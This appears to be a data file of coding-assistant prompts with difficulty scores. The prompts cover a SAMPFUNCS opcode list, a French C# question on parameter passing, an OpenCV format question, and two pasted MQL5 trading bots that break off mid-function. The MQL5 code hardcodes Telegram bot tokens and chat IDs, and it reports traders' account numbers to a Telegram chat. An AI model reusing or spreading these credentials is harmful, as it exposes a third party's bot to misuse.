bool result, int value = getSampfuncsGlobalVar(zstring var) 0BFD
sampCreate3dTextEx(int id, zstring text, uint color, float posX, float posY, float posZ, float distance, bool ignoreWalls, int playerId, int vehicleId) 0C45
zstring string, uint color, float posX, float posY, float posZ, float distance, bool ignoreWalls, int playerId, int vehicleId = sampGet3dTextInfoById(int id) 0C46
sampSet3dTextString(int id, zstring text) 0C47
sampTextdrawCreate(int id, zstring text, float posX, float posY) 0C48
sampTextdrawSetBoxColorAndSize(int id, int box, uint color, float sizeX, float sizeY) 0C49
sampTextdrawSetAlign(int id, int align) 0C4A
sampTextdrawSetProportional(int id, int proportional) 0C4B
sampTextdrawSetStyle(int id, int style) 0C4C
sampTextdrawSetShadow(int id, int shadow, uint color) 0C4D
sampTextdrawSetOutlineColor(int id, int outline, uint color) 0C4E
sampTextdrawSetModelRotationZoomVehColor(int id, int model, float rotX, float rotY, float rotZ, float zoom, int clr1, int clr2) 0C4F
sampTextdrawSetString(int id, zstring text) 0C50
sampTextdrawSetPos(int id, float posX, float posY) 0C51
sampTextdrawSetLetterSizeAndColor(int id, float letSizeX, float letSizeY, uint color) 0C52
int box, uint color, float sizeX, float sizeY = sampTextdrawGetBoxEnabledColorAndSize(int id) 0C53
int align = sampTextdrawGetAlign(int id) 0C54
int prop = sampTextdrawGetProportional(int id) 0C55
int style = sampTextdrawGetStyle(int id) 0C56
int shadow, uint color = sampTextdrawGetShadowColor(int id) 0C57
int outline, uint color = sampTextdrawGetOutlineColor(int id) 0C58
int model, float rotX, float rotY, float rotZ, float zoom, int clr1, int clr2 = sampTextdrawGetModelRotationZoomVehColor(int id) 0C59
zstring text = sampTextdrawGetString(int id) 0C5A
float posX, float posY = sampTextdrawGetPos(int id) 0C5B
float letSizeX, float letSizeY, uint color = sampTextdrawGetLetterSizeAndColor(int id) 0C5C
bool result = sampTextdrawIsExists(int id) 0C5D
sampTextdrawDelete(int id) 0C5E
bool result = isSampfuncsGlobalVarDefined(zstring var) 0C5F
bool read, bool write = getSampfuncsGlobalVarAccessForThread(zstring var, uint thread) 0C61
runSampfuncsConsoleCommand(zstring cmd) 0C62
bool result = sampfuncsRegisterConsoleCommand(zstring cmd, function func) 0C63
bool result = sampfuncsUnregisterConsoleCommand(zstring cmd) 0C64
uint thread = createScmThreadAtPointer(uint pointer, table args) 0C6B
setScmThreadLocalVar(uint thread, int var, any value) 0C6C
int value = getScmThreadLocalVar(uint thread, int var) 0C6D
destroyScmThread(uint thread) 0C6E
restartScmThread(uint thread, table args) 0C6F
bool result = isSampfuncsConsoleActive() 0C7E
sampSetClientCommandDescription(zstring cmd, zstring text) 0C7F
setSampfuncsConsoleCommandDescription(zstring cmd, zstring text) 0C80
sampForceVehicleSync(int id) 0C81
sampForceUnoccupiedSyncSeatId(int id, int seatId) 0C82
sampForceOnfootSync() 0C83
sampForceAimSync() 0C84
sampForceTrailerSync(int id) 0C85
sampForcePassengerSyncSeatId(int id, int seatId) 0C86
sampForceStatsSync() 0C87
sampForceWeaponsSync() 0C88
int id = sampGetMaxPlayerId(bool streamed) 0C8A
int count = sampGetPlayerCount(bool streamed) 0C8B
sampProcessChatInput(zstring text) 0C8F
bool result = sampIsChatCommandDefined(zstring cmd) 0C90
bool result = isSampfuncsConsoleCommandDefined(zstring cmd) 0C91
int version = getCleoLibraryVersion() 0C92
|
9c8b0a198cf8e7e70fcc4d5eba8e9297
|
{
"intermediate": 0.34861332178115845,
"beginner": 0.4820428192615509,
"expert": 0.16934382915496826
}
|
45,762
|
est ce que quand je modifie curX dans cette fonction ça modifie la valeur de curX de l'element qui a appelé la fonction o upas:
void ajouterEquipement(EntréeEquipements equipement, IPrsUnit newUnit, IPrsObject vue = null, int curX = 0, int curY = 0, int maxRowLength = 0)
{
try
{
Console.WriteLine("\n new object: " + equipement.nomTagGtcDef);
IPrsObject obj = null;
try
{
obj = newUnit.ObjectsEx.AddEx(equipement.nomTagGtcDef);
}
catch (Exception e)
{
// ça veut dire qu'il existait déjà on va donc le reprendre
foreach (IPrsObject objet in newUnit.ObjectsEx)
{
if (objet.Name == equipement.nomTagGtcDef)
{
obj = objet;
break;
}
}
}
obj.ModuleName = equipement.getModuleName();
obj.ClassName = equipement.getClassName();
Console.WriteLine("moduleName: " + equipement.getModuleName());
Console.WriteLine("classname: " + equipement.getClassName());
foreach (String opcADesactiver in equipement.getOPCDesactives())
{
obj.Value[opcADesactiver, 0] = "";
}
Console.WriteLine("Propriétés modifiées:");
// je parcours le dictionnaire String,String de equipement.getNewProps et j'affiche tout
if (worksheetsProprietes != null)
{
Dictionary<String, String> newProps = equipement.getNewProps(worksheetsProprietes);
foreach (KeyValuePair<String, String> entry in newProps)
{
if (entry.Key == "Info_API" && entry.Value != "#DEFAUT")
{
// on regarde si le unit contient un élément avec le className 'Information API' et le nom entry.Value
Boolean infoAPIExiste = false;
foreach (IPrsObject objet in newUnit.ObjectsEx)
{
if (objet.ClassName == "Info_API" && objet.Name == entry.Value)
{
infoAPIExiste = true;
break;
}
}
if (!infoAPIExiste)
{
IPrsObject infoAPI = newUnit.ObjectsEx.AddEx(entry.Value);
infoAPI.ClassName = "Info_API";
infoAPI.ModuleName = "Elementaires";
infoAPI.Value["Channel", 0] = "A MODIFIER";
String nomObjSrv = "";
// on parcourt le unit de la racine (celui du site) et on regarde va prendre le Name
// de l'objet avec comme className 'OPC' et comme moduleName Equipment
foreach (IPrsObject obUnitParent in unitSite.ObjectsEx)
{
if (obUnitParent.ClassName == "OPC" && obUnitParent.ModuleName == "Equipment")
{
nomObjSrv = obUnitParent.Name;
break;
}
}
string valOPCAPI = "/" + nomSite + "/" + nomObjSrv;
if (nomObjSrv == "")
{
valOPCAPI = "A CHANGER";
}
infoAPI.Value["OPC", 0] = valOPCAPI;
}
}
Console.WriteLine("key: " + entry.Key + " value: " + entry.Value);
if (entry.Value == "#DEFAUT")
{
LibrairieOutilsPanorama.resetPropriete(obj, entry.Key);
}
else
{
if (entry.Value.StartsWith("#NUM_"))
{
obj.Value[entry.Key, 0] = int.Parse(entry.Value.Substring(5));
}
if (entry.Value.StartsWith("#ENUM_"))
{
String value = entry.Value.Substring(6);
if (entry.Key == "Unite")
{
Console.WriteLine("test");
}
if (value == "#DEFAUT")
{
LibrairieOutilsPanorama.resetPropriete(obj, entry.Key);
}
else
{
obj.Value[entry.Key, 0] = LibrairieOutilsPanorama.getEnumValue(value);
}
}
else
{
obj.Value[entry.Key, 0] = entry.Value;
}
}
}
}
IPrsObject vueIncrustee = vue.CollectionEx["EmbeddedViews"].AddEx("vue_" + equipement.nomTagGtcDef);
// ça ne pose pas de pb si on modifie les propriétés avec ça
// on arrive dans le except si on essaye de créer la vue incrustée si elle existe déjà
// (donc si c'est déjà présent dans la vue on lui changera pas sa position)
vueIncrustee.ModuleName = "CODRA_Synopt";
vueIncrustee.ClassName = "EmbeddedViewHMI";
vueIncrustee.Value["ReferenceViewName", 0] = equipement.getView();
vueIncrustee.Value["KeepViewSize", 0] = true;
vueIncrustee.Value["X", 0] = curX;
vueIncrustee.Value["Y", 0] = curY;
curX += 300;
if (curX > maxRowLength)
{
curX = 0;
curY += 300;
}
}
catch (Exception exc)
{
// on a essaye d'ajouter un composant qui existe déjà, on touche à rien
Console.WriteLine("Erreur lors de l'ajout de l'équipement : " + exc.Message);
}
}
|
3b29efae9e64d5dded57b75089eb02a3
|
{
"intermediate": 0.2903640568256378,
"beginner": 0.39917299151420593,
"expert": 0.31046298146247864
}
|
45,763
|
how to convert a BGR to UYVY format using opencv
|
00ad3268fe8f07549d4339204a26f1a5
|
{
"intermediate": 0.3387773036956787,
"beginner": 0.16684138774871826,
"expert": 0.4943813979625702
}
|
45,764
|
//+------------------------------------------------------------------+
//| best_ex_auto.mq5 |
//| Copyright 2024, MetaQuotes Ltd. |
//| https://www.mql5.com |
//+------------------------------------------------------------------+
#property copyright "Copyright 2024, MetaQuotes Ltd."
#property link "https://www.mql5.com"
#property version "1.00"
const string ID = "-1002113042792";
const string token = "6853490040:AAH2AcCjJ1MVRziJ7BPmM6WveuOi0DBZ6so";
const string IDToLicense = "-1002100526472";
const string IDToTest = "-1002073319919";
int Case;
//+------------------------------------------------------------------+
//| Expert initialization function |
//+------------------------------------------------------------------+
int OnInit()
{
//---
//sendMessage(ID,token);
//---
return(INIT_SUCCEEDED);
}
//+------------------------------------------------------------------+
//| Expert deinitialization function |
//+------------------------------------------------------------------+
void OnDeinit(const int reason)
{
//---
}
//+------------------------------------------------------------------+
//| Expert tick function |
//+------------------------------------------------------------------+
void OnTick()
{
//---
sendMessage(ID,token);
}
//+------------------------------------------------------------------+
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void sendMessage(string chatID, string botToken)
{
string baseUrl = "https://api.telegram.org";
string headers = "";
string requestURL = "";
string requestHeaders = "";
char resultData[];
char posData[];
int timeout = 200;
string result[];
string sep = ",";
ushort sep_u = StringGetCharacter(sep,0);
string searchPattern = ("text");
string sep2 = " ";
ushort sep2_u = StringGetCharacter(sep2,0);
string result2[];
requestURL = StringFormat("%s/bot%s/getUpdates?chat_id=%s&offset=-1",baseUrl,botToken,chatID);
int response = WebRequest("GET",requestURL,headers,timeout,posData,resultData,requestHeaders);
string resultMessage = CharArrayToString(resultData);
int k = (StringSplit(resultMessage,sep_u,result));
if(k>0)
{
for(int i=0; i<k; i++)
{
if(StringFind(result[i], searchPattern) >= 0)
{
string res = StringSubstr(result[i],8,StringLen(result[i]));
int z = StringSplit(res,sep2_u,result2);
Case = (int)result2[1];
Print(Case);
}
}
}
if(Case == 1)
{
}
if(Case == 2)
{
}
if(Case == 3)
{
}
if(Case == 4)
{
}
if(Case == 5)
{
}
if(Case == 6)
{
}
}
//+------------------------------------------------------------------+
//| ProjectName |
//| Copyright 2020, CompanyName |
//| http://www.companyname.net |
//+------------------------------------------------------------------+
#include <Controls\Dialog.mqh>
#include <Controls\Button.mqh>
#include <Trade\PositionInfo.mqh>
#include <Trade\Trade.mqh>
#include <Trade\SymbolInfo.mqh>
#include <Controls\Label.mqh>
#include <Controls\Edit.mqh>
const string ID = "-1002113042792";
const string token = "7152618530:AAGJJC3zdkmCce3B7i11Dn2JDMh7GqpamyM";
const string IDToLicense = "-1002100526472";
#define INDENT_LEFT (11)
#define INDENT_TOP (11)
#define CONTROLS_GAP_X (5)
#define BUTTON_WIDTH (100)
#define BUTTON_HEIGHT (20)
CPositionInfo m_position;
CTrade m_trade;
CSymbolInfo m_symbol;
CLabel m_labelPipsToChange; // Метка для значения PipsToChange
CEdit m_editPipsToChange;
CLabel m_labelPipsToDownChange; // Метка для значения PipsToChange
CLabel m_labelPipsToDownChange2;
CEdit m_editPipsToDownChange;
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
class CAppWindowTwoButtons : public CAppDialog
{
private:
CButton m_button1; // the button object
CButton m_button2; // the button object
CLabel m_labelProfit;
CLabel m_labelLots;
CLabel m_labelProfitSell;
CLabel m_labelProfitBuy;
CLabel m_labelProfitPerc;
public:
CAppWindowTwoButtons(void);
~CAppWindowTwoButtons(void);
//--- create
virtual bool Create(const long chart,const string name,const int subwin,const int x1,const int y1,const int x2,const int y2);
//--- chart event handler
virtual bool OnEvent(const int id,const long &lparam,const double &dparam,const string &sparam);
void UpdateProfitLabel(void);
void UpdateLabelLots(void);
void UpdateProfitSell(void);
void UpdateProfitBuy(void);
void OnPipsToChangeEdit(void);
bool CreatePipsToChangeControls(void);
void OnPipsToDownChangeEdit(void);
bool CreatePipsToDownChangeControls(void);
void UpdateProfitLabelPerc(void);
//--- create dependent controls
bool CreateButton1(void);
bool CreateButton2(void);
bool CreateProfitLabel(void);
bool CreateLabelLots(void);
bool CreateProfitSell(void);
bool CreateProfitBuy(void);
bool CreateProfitLabelPerc(void);
//--- handlers of the dependent controls events
void OnClickButton1(void);
void OnClickButton2(void);
};
//+------------------------------------------------------------------+
//| Event Handling |
//+------------------------------------------------------------------+
EVENT_MAP_BEGIN(CAppWindowTwoButtons)
ON_EVENT(ON_CLICK,m_button1,OnClickButton1)
ON_EVENT(ON_CLICK,m_button2,OnClickButton2)
ON_EVENT(ON_CHANGE,m_editPipsToChange,OnPipsToChangeEdit)
ON_EVENT(ON_CHANGE,m_editPipsToDownChange,OnPipsToDownChangeEdit)
ON_EVENT(ON_CHANGE,m_editPipsToChange,OnPipsToChangeEdit)
EVENT_MAP_END(CAppDialog)
//+------------------------------------------------------------------+
//| Constructor |
//+------------------------------------------------------------------+
CAppWindowTwoButtons::CAppWindowTwoButtons(void)
{
}
//+------------------------------------------------------------------+
//| Destructor |
//+------------------------------------------------------------------+
CAppWindowTwoButtons::~CAppWindowTwoButtons(void)
{
}
//+------------------------------------------------------------------+
//| Create |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::Create(const long chart,const string name,const int subwin,const int x1,const int y1,const int x2,const int y2)
{
if(!CAppDialog::Create(chart,name,subwin,x1,y1,x2,y2))
return(false);
//--- create dependent controls
if(!CreateButton1() || !CreateButton2() || !CreateProfitLabel() || !CreatePipsToChangeControls() || !CreatePipsToDownChangeControls() || !CreateLabelLots() || !CreateProfitSell() || !CreateProfitBuy() || !CreateProfitLabelPerc())
return(false);
//--- succeed
return(true);
}
//+------------------------------------------------------------------+
//| Global Variable |
//+------------------------------------------------------------------+
CAppWindowTwoButtons ExtDialog;
//+------------------------------------------------------------------+
//| Expert initialization function |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateProfitLabelPerc(void)
{
int x1=INDENT_LEFT+150;
int y1=INDENT_TOP+165;
int x2=x1+INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X; // длина метки может быть больше, чтобы вместить текст
int y2=y1+BUTTON_HEIGHT;
if(!m_labelProfitPerc.Create(0, "LabelProfitPerc", 0, x1, y1, x2, y2))
return(false);
double profit = CalculateTotalProfit();
double TrueProfit = profit - g_initialProfit + profitCloseSell + profitCloseBuy;
TrueProfit = NormalizeDouble(((TrueProfit * 100) / AccountInfoDouble(ACCOUNT_BALANCE)),_Digits);
// Обновляем текст метки с прибылью
string profitText = StringFormat("Прибыль в процентах: %.2f", TrueProfit);
m_labelProfitPerc.Text(profitText);
if(!Add(m_labelProfitPerc))
return(false);
return(true);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::UpdateProfitLabelPerc(void)
{
// Вычисляем текущую прибыль со всех открытых позиций
double profit = CalculateTotalProfit();
double TrueProfit = profit - g_initialProfit + profitCloseSell + profitCloseBuy;
TrueProfit = NormalizeDouble(((TrueProfit * 100) / AccountInfoDouble(ACCOUNT_BALANCE)),_Digits);
// Обновляем текст метки с прибылью
string profitText = StringFormat("Прибыль в процентах: %.2f", TrueProfit);
m_labelProfitPerc.Text(profitText);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateProfitSell(void)
{
int x1=INDENT_LEFT;
int y1=INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X+5;
int x2=x1+INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X; // длина метки может быть больше, чтобы вместить текст
int y2=y1+BUTTON_HEIGHT+10;
if(!m_labelProfitSell.Create(0, "Label lots Sell", 0, x1, y1, x2, y2))
return(false);
double profitSell = 0;
for(int i=PositionsTotal()-1; i>=0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_SELL)
continue;
profitSell += m_position.Profit();
}
string ProfitSellText = StringFormat("Прибыль по sell: %.2f", profitSell);
m_labelProfitSell.Text(ProfitSellText);
if(!Add(m_labelProfitSell))
return(false);
return(true);
}
////+------------------------------------------------------------------+
////| |
//
////+------------------------------------------------------------------+
void CAppWindowTwoButtons::UpdateProfitSell(void)
{
double profitSell = 0;
for(int i=PositionsTotal()-1; i>=0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_SELL)
continue;
profitSell += m_position.Profit();
}
string ProfitSellText = StringFormat("Прибыль по sell: %.2f", profitSell + profitCloseSell);
m_labelProfitSell.Text(ProfitSellText);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateProfitBuy(void)
{
int x1=INDENT_LEFT+190;
int y1=INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X+5;
int x2=x1+INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X; // длина метки может быть больше, чтобы вместить текст
int y2=y1+BUTTON_HEIGHT+10;
if(!m_labelProfitBuy.Create(0, "Label lots Buy", 0, x1, y1, x2, y2))
return(false);
double profitBuy = 0;
for(int i=PositionsTotal()-1; i>=0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_BUY)
continue;
profitBuy += m_position.Profit();
}
string ProfitBuyText = StringFormat("Прибыль по buy: %.2f", profitBuy);
m_labelProfitBuy.Text(ProfitBuyText);
if(!Add(m_labelProfitBuy))
return(false);
return(true);
}
////+------------------------------------------------------------------+
////| |
//
////+------------------------------------------------------------------+
void CAppWindowTwoButtons::UpdateProfitBuy(void)
{
double profitBuy = 0;
for(int i=PositionsTotal()-1; i>=0; i--)
{
string symbol = PositionGetSymbol(i);
if(!PositionSelect(symbol))
continue;
if(m_position.SelectByIndex(i))
if(PositionGetInteger(POSITION_TYPE) != ORDER_TYPE_BUY)
continue;
profitBuy += m_position.Profit();
}
string ProfitBuyText = StringFormat("Прибыль по buy: %.2f", profitBuy + profitCloseBuy);
m_labelProfitBuy.Text(ProfitBuyText);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateLabelLots(void)
{
int x1=INDENT_LEFT;
int y1=INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X+150;
int x2=x1+INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X; // длина метки может быть больше, чтобы вместить текст
int y2=y1+BUTTON_HEIGHT+10;
if(!m_labelLots.Create(0, "Label lots", 0, x1, y1, x2, y2))
return(false);
double totalLots = 0.0;
for(int i = PositionsTotal() - 1; i >= 0; i--)
{
if(m_position.SelectByIndex(i))
{
totalLots += m_position.Volume();
}
}
string LotsText = StringFormat("Кол-во лотов: %.2f", totalLots);
m_labelLots.Text(LotsText);
if(!Add(m_labelLots))
return(false);
return(true);
}
//
////+------------------------------------------------------------------+
////| |
//
////+------------------------------------------------------------------+
void CAppWindowTwoButtons::UpdateLabelLots(void)
{
double totalLots = 0.0;
for(int i = PositionsTotal() - 1; i >= 0; i--)
{
if(m_position.SelectByIndex(i))
{
totalLots += m_position.Volume();
}
}
string LotsText = StringFormat("Кол-во лотов: %.2f", totalLots);
m_labelLots.Text(LotsText);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreatePipsToDownChangeControls(void)
{
// Создание метки для PipsToChange
if(!m_labelPipsToDownChange.Create(0,"LabelPipsToDownChange",0,10,115,130,150))
return false;
m_labelPipsToDownChange.Text("Пункты на которые изменится цена");
if(!Add(m_labelPipsToDownChange))
return(false);
if(!m_labelPipsToDownChange2.Create(0,"LabelPipsToDownChange2",0,10,140,130,170))
return false;
m_labelPipsToDownChange2.Text("после безубытка:");
if(!Add(m_labelPipsToDownChange2))
return(false);
// Создание поля для ввода PipsToChange
if(!m_editPipsToDownChange.Create(0,"EditPipsToDownChange",0,150,140,200,165))
return false;
if(!m_editPipsToDownChange.ReadOnly(false))
return(false);
m_editPipsToDownChange.Text(IntegerToString(PercentToDown));
if(!Add(m_editPipsToDownChange))
return(false);
return true;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::OnPipsToDownChangeEdit(void)
{
PercentToDown = StringToInteger(m_editPipsToDownChange.Text());
// Дополнительная валидация может потребоваться здесь
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreatePipsToChangeControls(void)
{
// Создание метки для PipsToChange
if(!m_labelPipsToChange.Create(0,"LabelPipsToChange",0,10,65,100,10))
return false;
m_labelPipsToChange.Text("Количество пунктов изменения цены:");
if(!Add(m_labelPipsToChange))
return(false);
// Создание поля для ввода PipsToChange
if(!m_editPipsToChange.Create(0,"EditPipsToChange",0,10,85,60,110))
return false;
if(!m_editPipsToChange.ReadOnly(false))
return(false);
m_editPipsToChange.Text(IntegerToString(PipsToChange));
if(!Add(m_editPipsToChange))
return(false);
return true;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::OnPipsToChangeEdit(void)
{
PipsToChange = StringToInteger(m_editPipsToChange.Text());
// Дополнительная валидация может потребоваться здесь
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateProfitLabel(void)
{
int x1=INDENT_LEFT+180;
int y1=INDENT_TOP+185;
int x2=x1+INDENT_TOP+BUTTON_HEIGHT+CONTROLS_GAP_X; // длина метки может быть больше, чтобы вместить текст
int y2=y1+BUTTON_HEIGHT;
if(!m_labelProfit.Create(0, "LabelProfit", 0, x1, y1, x2, y2))
return(false);
m_labelProfit.FontSize(10);
double profit = CalculateTotalProfit();
double TrueProfit = profit - g_initialProfit + profitCloseSell + profitCloseBuy;
// Обновляем текст метки с прибылью
string profitText = StringFormat("Прибыль: %.2f", TrueProfit);
m_labelProfit.Text(profitText);
if(!Add(m_labelProfit))
return(false);
return(true);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CAppWindowTwoButtons::UpdateProfitLabel(void)
{
// Вычисляем текущую прибыль со всех открытых позиций
double profit = CalculateTotalProfit();
double TrueProfit = profit - g_initialProfit + profitCloseSell + profitCloseBuy;
// Обновляем текст метки с прибылью
string profitText = StringFormat("Прибыль: %.2f", TrueProfit);
profitToLine = TrueProfit;
m_labelProfit.Text(profitText);
profitToSend = StringFormat("Прибыль: %.2f", TrueProfit);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateButton1(void)
{
//--- coordinates
int x1=INDENT_LEFT+15; // x1 = 11 pixels
int y1=INDENT_TOP; // y1 = 11 pixels
int x2=x1+BUTTON_WIDTH; // x2 = 11 + 100 = 111 pixels
int y2=y1+BUTTON_HEIGHT; // y2 = 11 + 20 = 32 pixels
//--- create
if(!m_button1.Create(0,"Button1",0,x1,y1,x2,y2))
return(false);
if(!m_button1.Text("Закрыть sell"))
return(false);
if(!Add(m_button1))
return(false);
//--- succeed
return(true);
}
//+------------------------------------------------------------------+
//| Create the "Button2" |
//+------------------------------------------------------------------+
bool CAppWindowTwoButtons::CreateButton2(void)
{
//--- coordinates
int x1=INDENT_LEFT+195; // x1 = 11 + 2 * (100 + 5) = 221 pixels
int y1=INDENT_TOP; // y1 = 11 pixels
int x2=x1+BUTTON_WIDTH; // x2 = 221 + 100 = 321 pixels
int y2=y1+BUTTON_HEIGHT; // y2 = 11 + 20 = 31 pixels
//--- create
if(!m_button2.Create(0,"Button2",0,x1,y1,x2,y2))
return(false);
if(!m_button2.Text("Закрыть buy"))
return(false);
if(!Add(m_button2))
return(false);
//--- succeed
return(true);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
input long PipsToChangeint = 500; // Количество пунктов изменения цены
input double InitialLots = 0.1; // Количество лотов для начальной сделки
input double LotChangePercent = 30.0; // Процент изменения количества лотов
ENUM_TIMEFRAMES TimeFrame = Period();
input long PercentToDownInt = 1000; //Пункты изменения цены после безубытка
ENUM_TIMEFRAMES TimeLast;
long PipsToChange = PipsToChangeint;
long PercentToDown = PercentToDownInt;
double PriceDown = 0;
double PriceUp = 10000000000;
double LineOfBreak = 0;
double maxOpenPriceLast = 0;
double minOpenPriceLast = 0;
double profitCloseSell = 0.0;
double profitCloseBuy = 0.0;
double g_initialProfit = 0.0;
double currentLots = InitialLots;
double lastPrice = SymbolInfoDouble(_Symbol, SYMBOL_BID);
bool close_s = false;
bool close_b = false;
bool start_b = false;
bool start_s = false;
bool send_b;
bool send_s;
string profitToSend;
double profitToLine;
double priceLine;
bool close_all = false;
bool start = false;
datetime lastBarTime = 0;
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
int sendMessage(string text, string chatID, string botToken)
{
string baseUrl = "https://api.telegram.org";
string headers = "";
string requestURL = "";
string requestHeaders = "";
char resultData[];
char posData[];
int timeout = 200;
requestURL = StringFormat("%s/bot%s/sendmessage?chat_id=%s&text=%s",baseUrl,botToken,chatID,text);
int response = WebRequest("POST",requestURL,headers,timeout,posData,resultData,requestHeaders);
string resultMessage = CharArrayToString(resultData);
return response;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
int getMessage(string chatID, string botToken)
{
string baseUrl = "https://api.telegram.org";
string headers = "";
string requestURL = "";
string requestHeaders = "";
char resultData[];
char posData[];
int timeout = 200;
string result[];
string sep = ",";
ushort sep_u = StringGetCharacter(sep,0);
string searchPattern = ("text");
string sep2 = "n";
ushort sep2_u = StringGetCharacter(sep2,0);
string result2[];
long accountNumber = AccountInfoInteger(ACCOUNT_LOGIN);
requestURL = StringFormat("%s/bot%s/getChat?chat_id=%s",baseUrl,botToken,chatID);
int response = WebRequest("GET",requestURL,headers,timeout,posData,resultData,requestHeaders);
string resultMessage = CharArrayToString(resultData);
int k = (StringSplit(resultMessage,sep_u,result));
if(k>0)
{
for(int i=0; i<k; i++)
{
if(StringFind(result[i], searchPattern) >= 0)
{
string res = StringSubstr(result[i],8,StringLen(result[i])-10);
int z = StringSplit(res,sep2_u,result2);
if(z>0)
{
for(int j=0; j<z; j++)
{
string finalResult;
int g = StringFind(result2[j],"\\",0);
if(g != -1)
{
finalResult = StringSubstr(result2[j],0,StringLen(result2[j])-1);
}
else
{
finalResult = result2[j];
}
if(finalResult == (string)accountNumber)
{
return true;
}
}
}
}
}
}
string wrongAccess = "Пытались торговать с счёта " + (string)accountNumber;
sendMessage(wrongAccess,ID,token);
return false;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double CalculateTotalProfit()
{
double totalProfit = 0.0;
for(int i = PositionsTotal() - 1; i >= 0; i--)
{
if(m_position.SelectByIndex(i))
{
totalProfit += m_position.Profit();
}
}
return totalProfit;
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
int OnInit()
{
if(start != true)
{
g_initialProfit = CalculateTotalProfit();
}
if(!getMessage(IDToLicense,token))
return(INIT_FAILED);
if(!ExtDialog.Create(0,"Закрытие позиций и изменение вводных",0,15,100,420,350))
return(INIT_FAILED);
//--- run application
ExtDialog.Run();
MqlRates rates[];
if(CopyRates(_Symbol, TimeFrame, 0, 1, rates) > 0)
{
lastBarTime = rates[0].time;
}
else
{
Print("Ошибка при получении информации о барах: ", GetLastError());
return (INIT_FAILED);
}
if(start_b == false)
{
while(send_b != true)
{
OpenOrder(ORDER_TYPE_BUY, currentLots, "B");
start_b = true;
}
}
if(start_s == false)
{
while(send_s != true)
{
OpenOrder(ORDER_TYPE_SELL, currentLots, "S");
start_s = true;
}
}
if(start != true)
{
ENUM_TIMEFRAMES TimeInt = TimeFrame;
if(TimeInt > 16000)
{
TimeInt = (ENUM_TIMEFRAMES)((TimeInt - 16384) * 60);
}
int number = 1;
string message = StringFormat(
"Number: %ld "
"PipsToChange: %ld "
"InitialLots: %f "
"LotChangePercent: %f "
"TimeFrame: %d "
"PipsToBreak: %ld "
"Symbol: %s "
"NumberAcc: %lld",
number,
PipsToChangeint,
InitialLots,
LotChangePercent,
TimeInt,
PercentToDownInt,
_Symbol,
AccountInfoInteger(ACCOUNT_LOGIN));
sendMessage(message,ID,token);
start = true;
TimeLast = TimeInt;
}
ObjectCreate(0,"Линия безубытка",OBJ_HLINE,0,0,LineOfBreak);
ObjectSetInteger(0, "Линия безубытка", OBJPROP_COLOR, clrLime);
return(INIT_SUCCEEDED);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void OnDeinit(const int reason)
{
//---
Comment("");
//--- destroy dialog
ExtDialog.Destroy(reason);
ObjectDelete(0,"Линия безубытка");
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void OnChartEvent(const int id, // event ID
const long& lparam, // event parameter of the long type
const double& dparam, // event parameter of the double type
const string& sparam) // event parameter of the string type
{
ExtDialog.ChartEvent(id,lparam,dparam,sparam);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
double NormalizeLot(double lot, double min_lot, double max_lot, double lot_step)
{
// Подстраивание под минимально допустимое значение
lot = MathMax(min_lot, lot);
// Округление до ближайшего допустимого большего значения
double remainder = fmod(lot - min_lot, lot_step);
if (remainder > 0) {
lot += (lot_step - remainder); // Прибавляем разницу для достижения следующего шага, если остаток больше 0
}
// Подстраивание под максимально допустимое значение
lot = MathMin(max_lot, lot);
// Нормализация и возврат значения
return NormalizeDouble(lot, _Digits);
}
//+------------------------------------------------------------------+
//| |
//+------------------------------------------------------------------+
void CalculateAndSetLotSize()
{
double min_lot = SymbolInfoDouble(_Symbol, SYMBOL_VOLUME_MIN);
double max_lot = SymbolInfoDouble(_Symbol, SYMBOL_VOLUME_MAX);
double lot_step = SymbolInfoDouble(_Symbol, SYMBOL_VOLUME_STEP);
// Увеличение текущего размера лота на заданный процент
currentLots *= (1 + LotChangePercent / 100.0);
